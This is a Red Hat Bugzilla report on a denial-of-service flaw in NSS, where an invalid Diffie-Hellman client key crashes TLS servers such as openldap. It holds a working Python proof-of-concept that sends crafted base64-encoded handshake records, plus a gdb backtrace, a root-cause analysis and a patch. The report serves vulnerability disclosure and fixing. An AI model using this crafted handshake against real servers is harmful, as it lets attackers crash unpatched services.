1374803 – remotely triggerable SIGSEGV in processes that use nss for accepting TLS

RHEL Engineering is moving the tracking of its product development work on RHEL 6 through RHEL 9 to Red Hat Jira (issues.redhat.com). If you're a Red Hat customer, please continue to file support cases via the Red Hat customer portal. If you're not, please head to the "RHEL project" in Red Hat Jira and file new tickets here. Individual Bugzilla bugs in the statuses "NEW", "ASSIGNED", and "POST" are being migrated throughout September 2023. Bugs of Red Hat partners with an assigned Engineering Partner Manager (EPM) are migrated in late September as per pre-agreed dates. Bugs against components "kernel", "kernel-rt", and "kpatch" are only migrated if still in "NEW" or "ASSIGNED". If you cannot log in to RH Jira, please consult article #7032570. That failing, please send an e-mail to the RH Jira admins at rh-issues@redhat.com to troubleshoot your issue as a user management inquiry. The email creates a ServiceNow ticket with Red Hat. Individual Bugzilla bugs that are migrated will be moved to status "CLOSED", resolution "MIGRATED", and set with "MigratedToJIRA" in "Keywords". The link to the successor Jira issue will be found under "Links", have a little "two-footprint" icon next to it, and direct you to the "RHEL project" in Red Hat Jira (issue links are of type "https://issues.redhat.com/browse/RHEL-XXXX", where "X" is a digit). This same link will be available in a blue banner at the top of the page informing you that that bug has been migrated.

Bug 1374803 - remotely triggerable SIGSEGV in processes that use nss for accepting TLS

Summary: remotely triggerable SIGSEGV in processes that use nss for accepting TLS

Keywords:
Status:	CLOSED DUPLICATE of bug 1383883
Alias:	None
Product:	Red Hat Enterprise Linux 7
Classification:	Red Hat
Component:	nss
Sub Component:
Version:	7.2
Hardware:	All
OS:	All
Priority:	unspecified
Severity:	high
Target Milestone:	rc
Target Release:	---
Assignee:	Daiki Ueno
QA Contact:	BaseOS QE Security Team
Docs Contact:
URL:
Whiteboard:
Depends On:	CVE-2016-5285
Blocks:
TreeView+	depends on / blocked

Reported:	2016-09-09 16:46 UTC by Jeffrey Arbuckle
Modified:	2016-12-07 16:39 UTC (History)
CC List:	8 users (show)
Fixed In Version:
Doc Type:	If docs needed, set a value
Doc Text:
Clone Of:
Environment:
Last Closed:	2016-11-30 15:56:22 UTC
Target Upstream Version:
Embargoed:

Attachments	(Terms of Use)
propogate invalid key failure (458 bytes, patch) 2016-09-09 16:46 UTC, Jeffrey Arbuckle	rrelyea: review+	Details \| Diff
View All

Links
System	ID	Private	Priority	Status	Summary	Last Updated
Mozilla Foundation	1278645	0	None	None	None	2016-09-09 16:46:51 UTC

Description Jeffrey Arbuckle 2016-09-09 16:46:51 UTC

Created attachment 1199532 [details]
propogate invalid key failure

Description of problem:

A remote client can cause any server process using NSS to crash by sending an invalid DH key.  It primarily affects openldap-servers because that package uses nss for accepting TLS connections.

Version-Release number of selected component (if applicable):

nss 3.21.0-9.el7_2
openldap-servers 2.4.40-9.el7_2

How reproducible:

Always.


Steps to Reproduce:

1.  Given an nssdb setup with:

% openssl pkcs12 -export -name nickname -out server.pfx -inkey server.key -in server.crt -certfile server_ca.crt
% mkdir nssdb
% certutil -N -d nssdb
% pk12util -i server.pfx -d nssdb

% gdb /usr/lib64/nss/unsupported-tools/selfserv

(gdb) r -d nssdb -n 'nickname' -p 2099 -v -V tls1.0:

2.  Use the following python program to perform an invalid TLS handshake.

import socket
import base64

addr = "127.0.0.1"
port = 2099

# a client hello using TLS1.0, TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
client_hello = base64.b64decode("FgMBAC0BAAApAwFXLM1FbXJJaVhVVWpRempBcUxGRV9KWU5NNWpiMlh4VwAAAgAWAQA=")

# a client key exchange with Diffie-Hellman Client Params Pubkey
# of length 1 with value 0x01
key_exchange = base64.b64decode("FgMBAAcQAAADAAEBFAMBAAEBFgMBACgpeyfsg3fzqebC2kBo//CdXazK+49MKcOp26XK8wjum3lvYtSxlt81")

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((addr, port))
s.send(client_hello)
data = s.recv(1024)
s.send(key_exchange)
s.close()


Actual results:

Server process crashes with SIGSEGV.

[Switching to Thread 0x7ffff203b700 (LWP 14742)]
PK11_SignWithSymKey (symKey=0x0, mechanism=3461563235, param=param@entry=0x7ffff2037e30, sig=sig@entry=0x7ffff2037e70, data=data@entry=0x7ffff2037e50) at pk11obj.c:792
792         PK11SlotInfo *slot = symKey->slot;
(gdb) bt
#0  PK11_SignWithSymKey (symKey=0x0, mechanism=3461563235, param=param@entry=0x7ffff2037e30, sig=sig@entry=0x7ffff2037e70, data=data@entry=0x7ffff2037e50)
    at pk11obj.c:792
#1  0x00007ffff7bb347d in ssl3_ComputeRecordMACConstantTime (outLen=0x7ffff2037e1c, outbuf=0x7ffff2037ec0 "P\001", originalLen=40, inputLen=40,
    input=0x6a3d30 "SCRUBBED", headerLen=13,
    header=0x7ffff2037eb0 "", useServerMacKey=0, spec=0x69dfd0) at ssl3con.c:2539
#2  ssl3_HandleRecord (ss=ss@entry=0x69c3e0, cText=cText@entry=0x7ffff2037ff0, databuf=databuf@entry=0x69c7a0) at ssl3con.c:12414
#3  0x00007ffff7bb44a2 in ssl3_GatherCompleteHandshake (ss=0x69c3e0, flags=0) at ssl3gthr.c:378
#4  0x00007ffff7bb5285 in ssl_GatherRecord1stHandshake (ss=0x69c3e0) at sslcon.c:1213
#5  0x00007ffff7bbda25 in ssl_Do1stHandshake (ss=ss@entry=0x69c3e0) at sslsecur.c:109
#6  0x00007ffff7bbef3f in ssl_SecureRecv (ss=0x69c3e0, buf=0x7ffff2038660 "", len=10239, flags=0) at sslsecur.c:1232
#7  0x00007ffff7bc30b8 in ssl_Read (fd=<optimized out>, buf=0x7ffff2038660, len=10239) at sslsock.c:2438
#8  0x0000000000408512 in handle_connection (tcp_sock=0x67e1e0, model_sock=<optimized out>, requestCert=0) at selfserv.c:1348
#9  0x0000000000409004 in jobLoop (a=<optimized out>, b=<optimized out>, c=<optimized out>) at selfserv.c:647
#10 0x0000000000407641 in thread_wrapper (arg=0x67d7b0) at selfserv.c:616
#11 0x00007ffff6e0096b in _pt_root (arg=0x681810) at ../../../nspr/pr/src/pthreads/ptthread.c:212
#12 0x00007ffff6985dc5 in start_thread (arg=0x7ffff203b700) at pthread_create.c:308
#13 0x00007ffff64aeced in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:11

Expected results:

The error actually originates in ssl3_HandleDHClientKeyExchange().
It's call to PK11_PubDerive() correctly returns NULL upon catching the invalid key, but the function
never sets rv=SECFailure to propogate the failure.

selfserv should have closed the connection instead of derefrencing the symKey NULL pointer
and crashing.

See attached patch.


Additional info:

The bug was reported to the upstream nss project.   It was accidentally fixed with a code refactoring in version 3.25 .

Comment 2 Bob Relyea 2016-09-28 22:16:22 UTC

Comment on attachment 1199532 [details]
propogate invalid key failure

r+ rrelyea.

The report has properly analyzed the root issue.

Comment 3 Kai Engert (:kaie) (inactive account) 2016-09-28 23:13:56 UTC

(In reply to Jeffrey Arbuckle from comment #0)
> The bug was reported to the upstream nss project.   It was accidentally
> fixed with a code refactoring in version 3.25 .

I missed this part earlier.

Does this mean, NSS releases version 3.25 and later are already fixed?

Comment 4 Kai Engert (:kaie) (inactive account) 2016-09-28 23:18:22 UTC

(In reply to Kai Engert (:kaie) from comment #3)
> Does this mean, NSS releases version 3.25 and later are already fixed?

Bob said "yes".

Comment 6 Alicja Kario 2016-11-30 15:56:22 UTC

Issue was resolved with release of nss-3.21.3-2.el7_3 in https://rhn.redhat.com/errata/RHSA-2016-2779.html

If the solution does not work for you, open a new bug report.

*** This bug has been marked as a duplicate of bug 1383883 ***

Note You need to log in before you can comment on or make changes to this bug.